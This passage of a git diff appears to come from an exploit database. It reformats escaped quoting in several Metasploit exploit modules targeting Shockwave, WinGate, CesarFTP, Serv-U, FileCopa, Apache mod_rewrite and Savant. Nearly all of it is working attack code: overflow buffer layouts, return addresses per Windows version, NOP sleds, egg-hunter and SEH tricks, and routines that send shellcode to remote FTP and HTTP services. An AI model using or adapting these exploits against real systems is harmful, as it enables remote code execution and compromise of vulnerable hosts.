+					[ 'URL', 'https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15296.zip' ],
 				],
-			\'DefaultOptions\' =>
+			'DefaultOptions' =>
 				{
-					\'InitialAutoRunScript\' => \'migrate -f\'
+					'InitialAutoRunScript' => 'migrate -f'
 				},
-			\'Payload\'        =>
+			'Payload'        =>
 				{
-					\'Space\'         => 1024,
-					\'BadChars\'      => \"\\x00\\x09\\x0a\\x0d\",
+					'Space'         => 1024,
+					'BadChars'      => "\x00\x09\x0a\x0d",
 				},
-			\'Platform\'       => \'win\',
-			\'Targets\'        =>
+			'Platform'       => 'win',
+			'Targets'        =>
 				[
-					[ \'Automatic\',     { \'Ret\' => 0x0a0a0a0a } ], # tested on XP SP2 and XP SP3
+					[ 'Automatic',     { 'Ret' => 0x0a0a0a0a } ], # tested on XP SP2 and XP SP3
 				],
-			\'DisclosureDate\' => \'Oct 21 2010\',
-			\'DefaultTarget\'  => 0))
+			'DisclosureDate' => 'Oct 21 2010',
+			'DefaultTarget'  => 0))
 	end
 
 	def autofilter
@@ -64,8 +64,8 @@ class Metasploit3 < Msf::Exploit::Remote
 	#
 	def exploit
 
-		path = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"shockwave_rcsl.dir\" )
-		fd = File.open( path, \"rb\" )
+		path = File.join( Msf::Config.install_root, "data", "exploits", "shockwave_rcsl.dir" )
+		fd = File.open( path, "rb" )
 		@dir_data = fd.read(fd.stat.size)
 		fd.close
 
@@ -88,11 +88,11 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 msf
-
+
 
 
-
-
+
-
-
+
+
 
 
 
-
+
 
 
 
@@ -121,11 +121,11 @@ type=\"application/x-director\" PlayerVersion=11 pluginspage=\"http://www.macrom
 
 		# Transmit the response to the client
 		path = request.uri
-		if (path =~ /\\.DIR/i)
-			print_status(\"Sending exploit DIR to #{cli.peerhost}:#{cli.peerport}...\")
-			send_response(cli, @dir_data, { \'Content-Type\' => \'application/octet-stream\' })
+		if (path =~ /\.DIR/i)
+			print_status("Sending exploit DIR to #{cli.peerhost}:#{cli.peerport}...")
+			send_response(cli, @dir_data, { 'Content-Type' => 'application/octet-stream' })
 		else
-			print_status(\"Sending exploit HTML to #{cli.peerhost}:#{cli.peerport}...\")
+			print_status("Sending exploit HTML to #{cli.peerhost}:#{cli.peerport}...")
 			send_response_html(cli, content)
 		end
 
diff --git a/platforms/windows/remote/16690.rb b/platforms/windows/remote/16690.rb
index 4da75c1dc..536727272 100755
--- a/platforms/windows/remote/16690.rb
+++ b/platforms/windows/remote/16690.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require \'msf/core\'
+require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GoodRanking
@@ -18,41 +18,41 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			\'Name\'           => \'Qbik WinGate WWW Proxy Server URL Processing Overflow\',
-			\'Description\'    => %q{
+			'Name'           => 'Qbik WinGate WWW Proxy Server URL Processing Overflow',
+			'Description'    => %q{
 					This module exploits a stack buffer overflow in Qbik WinGate version
 				6.1.1.1077 and earlier. By sending malformed HTTP POST URL to the
 				HTTP proxy service on port 80, a remote attacker could overflow
 				a buffer and execute arbitrary code.
 			},
-			\'Author\'         => \'patrick\',
-			\'License\'        => MSF_LICENSE,
-			\'Version\'        => \'$Revision: 10394 $\',
-			\'References\'     =>
+			'Author'         => 'patrick',
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: 10394 $',
+			'References'     =>
 				[
-					[ \'CVE\', \'2006-2926\' ],
-					[ \'OSVDB\', \'26214\' ],
-					[ \'BID\', \'18312\' ],
+					[ 'CVE', '2006-2926' ],
+					[ 'OSVDB', '26214' ],
+					[ 'BID', '18312' ],
 				],
-			\'DefaultOptions\' =>
+			'DefaultOptions' =>
 				{
-					\'EXITFUNC\' => \'process\',
+					'EXITFUNC' => 'process',
 				},
-			\'Payload\'        =>
+			'Payload'        =>
 				{
-					\'Space\'    => 1000,
-					\'BadChars\' => \"\\x00\\x0a\\x0d\\x20+&=%\\/\\\\\\#;\\\"\\\':<>?\",
-					\'EncoderType\'   => Msf::Encoder::Type::AlphanumMixed,
-					\'StackAdjustment\' => -3500,
+					'Space'    => 1000,
+					'BadChars' => "\x00\x0a\x0d\x20+&=%\/\\\#;\"\':<>?",
+					'EncoderType'   => Msf::Encoder::Type::AlphanumMixed,
+					'StackAdjustment' => -3500,
 				},
-			\'Platform\'       => \'win\',
-			\'Targets\'        =>
+			'Platform'       => 'win',
+			'Targets'        =>
 				[
-					[ \'WinGate 6.1.1.1077\', { \'Ret\' => 0x01991932 } ], # call esi
+					[ 'WinGate 6.1.1.1077', { 'Ret' => 0x01991932 } ], # call esi
 				],
-			\'Privileged\'     => true,
-			\'DisclosureDate\' => \'Jun 07 2006\',
-			\'DefaultTarget\' => 0))
+			'Privileged'     => true,
+			'DisclosureDate' => 'Jun 07 2006',
+			'DefaultTarget' => 0))
 
 		register_options(
 			[
@@ -62,9 +62,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 		connect
-		sock.put(\"GET /\\r\\n\\r\\n\") # Malformed request to get proxy info
+		sock.put("GET /\r\n\r\n") # Malformed request to get proxy info
 		banner = sock.get_once
-		if (banner =~ /Server:\\sWinGate\\s6.1.1\\s\\(Build 1077\\)/)
+		if (banner =~ /Server:\sWinGate\s6.1.1\s\(Build 1077\)/)
 			return Exploit::CheckCode::Vulnerable
 		end
 		return Exploit::CheckCode::Safe
@@ -73,14 +73,14 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		connect
 
-		print_status(\"Trying target #{target.name}...\")
+		print_status("Trying target #{target.name}...")
 
 		buff = Rex::Text.rand_text_alphanumeric(3000)
 		buff[1200, 1000] = payload.encoded # jmp here
 		buff[2200, 5] = Rex::Arch::X86.jmp(-1005) # esi
-		buff[2284, 4] = [target[\'Ret\']].pack(\'V\') #eip
+		buff[2284, 4] = [target['Ret']].pack('V') #eip
 
-		sploit  = \"POST http://#{buff}/ HTTP/1.0\\r\\n\\r\\n\"
+		sploit  = "POST http://#{buff}/ HTTP/1.0\r\n\r\n"
 
 		sock.put(sploit)
 		sock.get_once(-1, 3)
diff --git a/platforms/windows/remote/16713.rb b/platforms/windows/remote/16713.rb
index bed30d058..64d0fae78 100755
--- a/platforms/windows/remote/16713.rb
+++ b/platforms/windows/remote/16713.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require \'msf/core\'
+require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = AverageRanking
@@ -18,57 +18,57 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			\'Name\'           => \'Cesar FTP 0.99g MKD Command Buffer Overflow\',
-			\'Description\'    => %q{
+			'Name'           => 'Cesar FTP 0.99g MKD Command Buffer Overflow',
+			'Description'    => %q{
 				This module exploits a stack buffer overflow in the MKD verb in CesarFTP 0.99g.
 
 				You must have valid credentials to trigger this vulnerability. Also, you
 				only get one chance, so choose your target carefully.
 			},
-			\'Author\'         => \'MC\',
-			\'License\'        => MSF_LICENSE,
-			\'Version\'        => \'$Revision: 11799 $\',
-			\'References\'     =>
+			'Author'         => 'MC',
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: 11799 $',
+			'References'     =>
 				[
-					[ \'CVE\', \'2006-2961\'],
-					[ \'OSVDB\', \'26364\'],
-					[ \'BID\', \'18586\'],
-					[ \'URL\', \'http://secunia.com/advisories/20574/\' ],
+					[ 'CVE', '2006-2961'],
+					[ 'OSVDB', '26364'],
+					[ 'BID', '18586'],
+					[ 'URL', 'http://secunia.com/advisories/20574/' ],
 				],
-			\'Privileged\'     => true,
-			\'DefaultOptions\' =>
+			'Privileged'     => true,
+			'DefaultOptions' =>
 				{
-					\'EXITFUNC\' => \'process\',
+					'EXITFUNC' => 'process',
 				},
-			\'Payload\'        =>
+			'Payload'        =>
 				{
-					\'Space\'    => 250,
-					\'BadChars\' => \"\\x00\\x20\\x0a\\x0d\",
-					\'StackAdjustment\' => -3500,
-					\'Compat\'        =>
+					'Space'    => 250,
+					'BadChars' => "\x00\x20\x0a\x0d",
+					'StackAdjustment' => -3500,
+					'Compat'        =>
 						{
-							\'SymbolLookup\' => \'ws2ord\',
+							'SymbolLookup' => 'ws2ord',
 						}
 				},
-			\'Platform\'       => \'win\',
-			\'Targets\'        =>
+			'Platform'       => 'win',
+			'Targets'        =>
 				[
-					[ \'Windows 2000 Pro SP4 English\', { \'Ret\' => 0x77e14c29 } ],
-					[ \'Windows 2000 Pro SP4 French\',  { \'Ret\' => 0x775F29D0 } ],
-					[ \'Windows XP SP2/SP3 English\',       { \'Ret\' => 0x774699bf } ], # jmp esp, user32.dll
-					#[ \'Windows XP SP2 English\',       { \'Ret\' => 0x76b43ae0 } ], # jmp esp, winmm.dll
-					#[ \'Windows XP SP3 English\',       { \'Ret\' => 0x76b43adc } ], # jmp esp, winmm.dll
-					[ \'Windows 2003 SP1 English\',     { \'Ret\' => 0x76AA679b } ],
+					[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e14c29 } ],
+					[ 'Windows 2000 Pro SP4 French',  { 'Ret' => 0x775F29D0 } ],
+					[ 'Windows XP SP2/SP3 English',       { 'Ret' => 0x774699bf } ], # jmp esp, user32.dll
+					#[ 'Windows XP SP2 English',       { 'Ret' => 0x76b43ae0 } ], # jmp esp, winmm.dll
+					#[ 'Windows XP SP3 English',       { 'Ret' => 0x76b43adc } ], # jmp esp, winmm.dll
+					[ 'Windows 2003 SP1 English',     { 'Ret' => 0x76AA679b } ],
 				],
-			\'DisclosureDate\' => \'Jun 12 2006\',
-			\'DefaultTarget\'  => 0))
+			'DisclosureDate' => 'Jun 12 2006',
+			'DefaultTarget'  => 0))
 	end
 
 	def check
 		connect
 		disconnect
 
-		if (banner =~ /CesarFTP 0\\.99g/)
+		if (banner =~ /CesarFTP 0\.99g/)
 			return Exploit::CheckCode::Vulnerable
 		end
 			return Exploit::CheckCode::Safe
@@ -77,12 +77,12 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		connect_login
 
-		sploit =  \"\\n\" * 671 + rand_text_english(3, payload_badchars)
-		sploit << [target.ret].pack(\'V\') + make_nops(40) + payload.encoded
+		sploit =  "\n" * 671 + rand_text_english(3, payload_badchars)
+		sploit << [target.ret].pack('V') + make_nops(40) + payload.encoded
 
-		print_status(\"Trying target #{target.name}...\")
+		print_status("Trying target #{target.name}...")
 
-		send_cmd( [\'MKD\', sploit] , false)
+		send_cmd( ['MKD', sploit] , false)
 
 		handler
 		disconnect
diff --git a/platforms/windows/remote/16715.rb b/platforms/windows/remote/16715.rb
index ddd7a9e94..58f4c1c17 100755
--- a/platforms/windows/remote/16715.rb
+++ b/platforms/windows/remote/16715.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require \'msf/core\'
+require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GoodRanking
@@ -18,9 +18,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			\'Name\'           => \'Serv-U FTPD MDTM Overflow\',
-			\'Description\'    => %q{
-					This is an exploit for the Serv-U\\\'s MDTM command timezone
+			'Name'           => 'Serv-U FTPD MDTM Overflow',
+			'Description'    => %q{
+					This is an exploit for the Serv-U\'s MDTM command timezone
 				overflow. It has been heavily tested against versions
 				4.0.0.4/4.1.0.0/4.1.0.3/5.0.0.0 with success against
 				nt4/2k/xp/2k3. I have also had success against version 3,
@@ -32,62 +32,62 @@ class Metasploit3 < Msf::Exploit::Remote
 				This exploit is a single hit, the service dies after the
 				shellcode finishes execution.
 			},
-			\'Author\'         => [ \'spoonm\' ],
-			\'License\'        => MSF_LICENSE,
-			\'Version\'        => \'$Revision: 10394 $\',
-			\'References\'     =>
+			'Author'         => [ 'spoonm' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: 10394 $',
+			'References'     =>
 				[
-					[ \'CVE\', \'2004-0330\'],
-					[ \'OSVDB\', \'4073\'],
-					[ \'URL\', \'http://archives.neohapsis.com/archives/bugtraq/2004-02/0654.html\'],
-					[ \'URL\', \'http://www.cnhonker.com/advisory/serv-u.mdtm.txt\'],
-					[ \'URL\', \'http://www.cnhonker.com/index.php?module=releases&act=view&type=3&id=54\'],
-					[ \'BID\', \'9751\'],
+					[ 'CVE', '2004-0330'],
+					[ 'OSVDB', '4073'],
+					[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-02/0654.html'],
+					[ 'URL', 'http://www.cnhonker.com/advisory/serv-u.mdtm.txt'],
+					[ 'URL', 'http://www.cnhonker.com/index.php?module=releases&act=view&type=3&id=54'],
+					[ 'BID', '9751'],
 				],
-			\'Privileged\'     => false,
-			\'Payload\'        =>
+			'Privileged'     => false,
+			'Payload'        =>
 				{
-					\'Space\'    => 1000,
-					\'BadChars\' => \"\\x00\\x7e\\x2b\\x26\\x3d\\x25\\x3a\\x22\\x0a\\x0d\\x20\\x2f\\x5c\\x2e\",
-					\'StackAdjustment\' => -3500,
+					'Space'    => 1000,
+					'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
+					'StackAdjustment' => -3500,
 				},
-			\'Targets\'        =>
+			'Targets'        =>
 				[
 					[
-						\'Serv-U Uber-Leet Universal ServUDaemon.exe\', # Tested OK - hdm 11/25/2005
+						'Serv-U Uber-Leet Universal ServUDaemon.exe', # Tested OK - hdm 11/25/2005
 						{
-							\'Platform\' => \'win\',
-							\'Ret\'      => 0x00401877,
+							'Platform' => 'win',
+							'Ret'      => 0x00401877,
 						},
 					],
 					[
-						\'Serv-U 4.0.0.4/4.1.0.0/4.1.0.3 ServUDaemon.exe\',
+						'Serv-U 4.0.0.4/4.1.0.0/4.1.0.3 ServUDaemon.exe',
 						{
-							\'Platform\' => \'win\',
-							\'Ret\'      => 0x0040164d,
+							'Platform' => 'win',
+							'Ret'      => 0x0040164d,
 						},
 					],
 					[
-						\'Serv-U 5.0.0.0 ServUDaemon.exe\',
+						'Serv-U 5.0.0.0 ServUDaemon.exe',
 						{
-							\'Platform\' => \'win\',
-							\'Ret\'      => 0x0040167e,
+							'Platform' => 'win',
+							'Ret'      => 0x0040167e,
 						},
 					],
 				],
-			\'DisclosureDate\' => \'Feb 26 2004\',
-			\'DefaultTarget\' => 0))
+			'DisclosureDate' => 'Feb 26 2004',
+			'DefaultTarget' => 0))
 
 		register_advanced_options(
 			[
-				OptInt.new(\'SEHOffset\', [ false, \"Offset from beginning of timezone to SEH\", 47 ]),
-				OptInt.new(\'ForceDoubling\', [ false, \"1 to force \\\\xff doubling for 4.0.0.4, 0 to disable it, 2 to autodetect\", 2 ]),
+				OptInt.new('SEHOffset', [ false, "Offset from beginning of timezone to SEH", 47 ]),
+				OptInt.new('ForceDoubling', [ false, "1 to force \\xff doubling for 4.0.0.4, 0 to disable it, 2 to autodetect", 2 ]),
 			], self.class)
 
 	end
 
 	# From 5.0.0.4 Change Log
-	# \"* Fixed bug in MDTM command that potentially caused the daemon to crash.\"
+	# "* Fixed bug in MDTM command that potentially caused the daemon to crash."
 	#
 	# Nice way to play it down boys
 	#
@@ -101,32 +101,32 @@ class Metasploit3 < Msf::Exploit::Remote
 		disconnect
 
 		case banner
-			when /Serv-U FTP Server v4\\.1/
-				print_status(\'Found version 4.1.0.3, exploitable\')
+			when /Serv-U FTP Server v4\.1/
+				print_status('Found version 4.1.0.3, exploitable')
 				return Exploit::CheckCode::Vulnerable
 
-			when /Serv-U FTP Server v5\\.0/
-				print_status(\'Found version 5.0.0.0 (exploitable) or 5.0.0.4 (not), try it!\');
+			when /Serv-U FTP Server v5\.0/
+				print_status('Found version 5.0.0.0 (exploitable) or 5.0.0.4 (not), try it!');
 				return Exploit::CheckCode::Appears
 
-			when /Serv-U FTP Server v4\\.0/
-				print_status(\'Found version 4.0.0.4 or 4.1.0.0, additional check.\');
-				send_user(datastore[\'USER\'])
-				send_pass(datastore[\'PASS\'])
+			when /Serv-U FTP Server v4\.0/
+				print_status('Found version 4.0.0.4 or 4.1.0.0, additional check.');
+				send_user(datastore['USER'])
+				send_pass(datastore['PASS'])
 				if (double_ff?())
-					print_status(\'Found version 4.0.0.4, exploitable\');
+					print_status('Found version 4.0.0.4, exploitable');
 					return Exploit::CheckCode::Vulnerable
 				else
-					print_status(\'Found version 4.1.0.0, exploitable\');
+					print_status('Found version 4.1.0.0, exploitable');
 					return Exploit::CheckCode::Vulnerable
 				end
 
 			when /Serv-U FTP Server/
-				print_status(\'Found an unknown version, try it!\');
+				print_status('Found an unknown version, try it!');
 				return Exploit::CheckCode::Detected
 
 			else
-				print_status(\'We could not recognize the server banner\')
+				print_status('We could not recognize the server banner')
 				return Exploit::CheckCode::Safe
 		end
 
@@ -137,23 +137,23 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		connect_login
 
-		print_status(\"Trying target #{target.name}...\")
+		print_status("Trying target #{target.name}...")
 
-		# Should have paid more attention to skylined\'s exploit, only after figuring
-		# out how my payloads were getting transformed did I remember seeing \\xff
+		# Should have paid more attention to skylined's exploit, only after figuring
+		# out how my payloads were getting transformed did I remember seeing \xff
 		# doubling in his CHMOD exploit, arg!
 		shellcode = payload.encoded
 
-		case datastore[\'ForceDoubling\']
+		case datastore['ForceDoubling']
 			when 1
-				print_status(\"Forced doubling of all \\\\xff sequences in the encoded payload\")
-				shellcode.gsub!(/\\xff/, \"\\xff\\xff\")
+				print_status("Forced doubling of all \\xff sequences in the encoded payload")
+				shellcode.gsub!(/\xff/, "\xff\xff")
 			when 0
-				print_status(\"Forced doubling has been disabled\")
+				print_status("Forced doubling has been disabled")
 			when 2
 				if (double_ff?())
-					print_status(\"Forced doubling enabled after detection of version 4.0.0.4\")
-					shellcode.gsub!(/\\xff/, \"\\xff\\xff\")
+					print_status("Forced doubling enabled after detection of version 4.0.0.4")
+					shellcode.gsub!(/\xff/, "\xff\xff")
 				end
 		end
 
@@ -161,21 +161,21 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Since we got here via a pop pop ret, we can just the address of the jmp
 		# off the stack, add esp, BYTE -4 ; pop edi
 
-		search_rtag = \"\\x34\\x33\\x32\\x31\" # +1 / 0 / -1 [start, end, stored]
+		search_rtag = "\x34\x33\x32\x31" # +1 / 0 / -1 [start, end, stored]
 		search_stub = Rex::Arch::X86.searcher(search_rtag)
-		search_code = \"\\x83\\xc4\\xfc\\x5f\" + search_stub + \'BB\'
-		if (datastore[\'SEHOffset\'] < search_code.length)
-			print_error(\"Not enough room for search code, adjust SEHOffset\")
+		search_code = "\x83\xc4\xfc\x5f" + search_stub + 'BB'
+		if (datastore['SEHOffset'] < search_code.length)
+			print_error("Not enough room for search code, adjust SEHOffset")
 			return
 		end
 
-		jump_back = Rex::Arch::X86.jmp_short(\'$+\' + (-1 * search_code.length).to_s) + \'BB\'
+		jump_back = Rex::Arch::X86.jmp_short('$+' + (-1 * search_code.length).to_s) + 'BB'
 
-		buf = \'MDTM 20031111111111+\' + (\'A\' * (datastore[\'SEHOffset\'] - search_code.length))
+		buf = 'MDTM 20031111111111+' + ('A' * (datastore['SEHOffset'] - search_code.length))
 		buf << search_code
 		buf << jump_back
-		buf << [target.ret].pack(\'V\')
-		buf << \' /\'
+		buf << [target.ret].pack('V')
+		buf << ' /'
 		buf << Rex::Arch::X86.dword_adjust(search_rtag, 1)
 		buf << shellcode
 		buf << search_rtag
@@ -187,7 +187,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def double_ff?
-		res = send_cmd( [\'P@SW\'], true )
+		res = send_cmd( ['P@SW'], true )
 		return (res and res =~ /^500/) ? true : false
 	end
 
diff --git a/platforms/windows/remote/16733.rb b/platforms/windows/remote/16733.rb
index 2313aa679..f2baa367e 100755
--- a/platforms/windows/remote/16733.rb
+++ b/platforms/windows/remote/16733.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require \'msf/core\'
+require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = AverageRanking
@@ -18,49 +18,49 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			\'Name\'           => \'FileCopa FTP Server pre 18 Jul Version\',
-			\'Description\'    => %q{
+			'Name'           => 'FileCopa FTP Server pre 18 Jul Version',
+			'Description'    => %q{
 					This module exploits the buffer overflow found in the LIST command
 				in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch
 			},
-			\'Author\'         => [ \'Jacopo Cervini\' ],
-			\'License\'        => MSF_LICENSE,
-			\'Version\'        => \'$Revision: 9179 $\',
-			\'References\'     =>
+			'Author'         => [ 'Jacopo Cervini' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: 9179 $',
+			'References'     =>
 				[
-					[ \'CVE\', \'2006-3726\' ],
-					[ \'OSVDB\', \'27389\' ],
-					[ \'BID\', \'19065\' ],
+					[ 'CVE', '2006-3726' ],
+					[ 'OSVDB', '27389' ],
+					[ 'BID', '19065' ],
 				],
-			\'Privileged\'     => true,
-			\'Payload\'        =>
+			'Privileged'     => true,
+			'Payload'        =>
 				{
-					\'Space\'    => 400,
-					\'BadChars\' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",
-					\'StackAdjustment\' => -3500,
+					'Space'    => 400,
+					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
+					'StackAdjustment' => -3500,
 				},
-			\'Platform\' => \'win\',
+			'Platform' => 'win',
 
-			\'Targets\'        =>
+			'Targets'        =>
 				[
-					[ \'Windows 2k Server SP4 English\',   { \'Ret\' => 0x7c2e7993, \'Nops\' => 160 } ], # jmp esp
-					[ \'Windows XP Pro SP2 Italian\',      { \'Ret\' => 0x77f62740, \'Nops\' => 240 } ]  # jmp esp
+					[ 'Windows 2k Server SP4 English',   { 'Ret' => 0x7c2e7993, 'Nops' => 160 } ], # jmp esp
+					[ 'Windows XP Pro SP2 Italian',      { 'Ret' => 0x77f62740, 'Nops' => 240 } ]  # jmp esp
 				],
-			\'DisclosureDate\' => \'Jul 19 2006\',
-			\'DefaultTarget\' => 0))
+			'DisclosureDate' => 'Jul 19 2006',
+			'DefaultTarget' => 0))
 	end
 
 
 	def exploit
 		connect_login
 
-		print_status(\"Trying target #{target.name}...\")
+		print_status("Trying target #{target.name}...")
 
-		sploit =  \"A \"
-		sploit << make_nops(target[\'Nops\'])
-		sploit << [target.ret].pack(\'V\') + make_nops(4) + \"\\x66\\x81\\xc1\\xa0\\x01\\x51\\xc3\" + make_nops(189) + payload.encoded
+		sploit =  "A "
+		sploit << make_nops(target['Nops'])
+		sploit << [target.ret].pack('V') + make_nops(4) + "\x66\x81\xc1\xa0\x01\x51\xc3" + make_nops(189) + payload.encoded
 
-		send_cmd( [\'LIST\', sploit] , false)
+		send_cmd( ['LIST', sploit] , false)
 
 		handler
 		disconnect
diff --git a/platforms/windows/remote/16752.rb b/platforms/windows/remote/16752.rb
index 25a33591b..cbc47f3be 100755
--- a/platforms/windows/remote/16752.rb
+++ b/platforms/windows/remote/16752.rb
@@ -10,7 +10,7 @@
 ##
 
 
-require \'msf/core\'
+require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking
@@ -19,62 +19,62 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			\'Name\'           => \'Apache module mod_rewrite LDAP protocol Buffer Overflow\',
-			\'Description\'    => %q{
+			'Name'           => 'Apache module mod_rewrite LDAP protocol Buffer Overflow',
+			'Description'    => %q{
 				This module exploits the mod_rewrite LDAP protocol scheme handling
 				flaw discovered by Mark Dowd, which produces an off-by-one overflow.
 				Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.
 				This module requires REWRITEPATH to be set accurately. In addition,
-				the target must have \'RewriteEngine on\' configured, with a specific
-				\'RewriteRule\' condition enabled to allow for exploitation.
+				the target must have 'RewriteEngine on' configured, with a specific
+				'RewriteRule' condition enabled to allow for exploitation.
 
 				The flaw affects multiple platforms, however this module currently
 				only supports Windows based installations.
 			},
-			\'Author\'         => \'patrick\',
-			\'Version\'        => \'$Revision: 8498 $\',
-			\'References\'     =>
+			'Author'         => 'patrick',
+			'Version'        => '$Revision: 8498 $',
+			'References'     =>
 				[
-					[ \'CVE\', \'2006-3747\' ],
-					[ \'OSVDB\', \'27588\' ],
-					[ \'BID\', \'19204\' ],
-					[ \'URL\', \'http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html\' ],
-					[ \'URL\', \'http://www.milw0rm.com/exploits/3680\' ],
-					[ \'URL\', \'http://www.milw0rm.com/exploits/3996\' ],
-					[ \'URL\', \'http://www.milw0rm.com/exploits/2237\' ],
+					[ 'CVE', '2006-3747' ],
+					[ 'OSVDB', '27588' ],
+					[ 'BID', '19204' ],
+					[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html' ],
+					[ 'URL', 'http://www.milw0rm.com/exploits/3680' ],
+					[ 'URL', 'http://www.milw0rm.com/exploits/3996' ],
+					[ 'URL', 'http://www.milw0rm.com/exploits/2237' ],
 				],
-			\'DefaultOptions\' =>
+			'DefaultOptions' =>
 				{
-					\'EXITFUNC\' => \'thread\',
+					'EXITFUNC' => 'thread',
 				},
-			\'Privileged\'     => true,
-			\'Platform\'       => [\'win\'], # \'linux\'],
-			\'Payload\'        =>
+			'Privileged'     => true,
+			'Platform'       => ['win'], # 'linux'],
+			'Payload'        =>
 				{
-					\'Space\'    => 636,
-					\'BadChars\' => \"\\x00\\x0a\\x0d\\x20\",
-					\'EncoderType\' => Msf::Encoder::Type::AlphanumUpper,
-					\'StackAdjustment\' => -3500,
-					\'DisableNops\'  =>  \'True\',
+					'Space'    => 636,
+					'BadChars' => "\x00\x0a\x0d\x20",
+					'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
+					'StackAdjustment' => -3500,
+					'DisableNops'  =>  'True',
 				},
-			\'Targets\'        =>
+			'Targets'        =>
 				[
-					[  \'Automatic\', {} ], # patrickw tested OK 20090310 win32
+					[  'Automatic', {} ], # patrickw tested OK 20090310 win32
 				],
-			\'DisclosureDate\' => \'Jul 28 2006\',
-			\'DefaultTarget\'  => 0))
+			'DisclosureDate' => 'Jul 28 2006',
+			'DefaultTarget'  => 0))
 
 			register_options(
 				[
-					OptString.new(\'REWRITEPATH\', [true, \"The mod_rewrite URI path\", \"rewrite_path\"]),
+					OptString.new('REWRITEPATH', [true, "The mod_rewrite URI path", "rewrite_path"]),
 				], self.class)
 	end
 
 
 	def check
 		res = send_request_raw({
-			\'uri\'     => \'/\',
-			\'version\' => \'1.1\',
+			'uri'     => '/',
+			'version' => '1.1',
 		}, 2)
 
 		if (res.to_s =~ /Apache/) # This could be smarter.
@@ -89,12 +89,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		# On Linux Apache, it is possible to overwrite EIP by
 		# sending ldap:// ... TODO patrickw
 
-		trigger = \'/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90\'
+		trigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90'
 
-		print_status(\"Sending payload.\")
+		print_status("Sending payload.")
 		send_request_raw({
-				\'uri\'     => \'/\' + datastore[\'REWRITEPATH\'] + trigger + payload.encoded,
-				\'version\' => \'1.0\',
+				'uri'     => '/' + datastore['REWRITEPATH'] + trigger + payload.encoded,
+				'version' => '1.0',
 				}, 2)
 		handler
 	end
diff --git a/platforms/windows/remote/16770.rb b/platforms/windows/remote/16770.rb
index 38500e4a5..bdeeaabcd 100755
--- a/platforms/windows/remote/16770.rb
+++ b/platforms/windows/remote/16770.rb
@@ -9,71 +9,71 @@
 # http://metasploit.com/framework/
 ##
 
-require \'msf/core\'
+require 'msf/core'
 
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking
 
-	HttpFingerprint = { :pattern => [ /Savant\\/3\\.1/ ] }
+	HttpFingerprint = { :pattern => [ /Savant\/3\.1/ ] }
 
 	include Msf::Exploit::Remote::HttpClient
 
 	def initialize(info = {})
 		super(update_info(info,
-			\'Name\'        => \'Savant 3.1 Web Server Overflow\',
-			\'Description\' => %q{
+			'Name'        => 'Savant 3.1 Web Server Overflow',
+			'Description' => %q{
 					This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service
 				supports a maximum of 10 threads (for a default install). Each exploit attempt
 				generally causes a thread to die whether sucessful or not. Therefore, in a default
 				configuration, you only have 10 chances.
 
 				Due to the limited space available for the payload in this exploit module, use of the
-				\"ord\" payloads is recommended.
+				"ord" payloads is recommended.
 			},
-			\'Author\'      => [ \'patrick\' ],
-			\'Arch\'		  => [ ARCH_X86 ],
-			\'License\'     => MSF_LICENSE,
-			\'Version\'     => \'$Revision: 10546 $\',
-			\'References\'  =>
+			'Author'      => [ 'patrick' ],
+			'Arch'		  => [ ARCH_X86 ],
+			'License'     => MSF_LICENSE,
+			'Version'     => '$Revision: 10546 $',
+			'References'  =>
 				[
-					[ \'CVE\', \'2002-1120\' ],
-					[ \'OSVDB\', \'9829\' ],
-					[ \'BID\', \'5686\' ],
-					[ \'URL\', \'http://www.milw0rm.com/exploits/787\' ],
+					[ 'CVE', '2002-1120' ],
+					[ 'OSVDB', '9829' ],
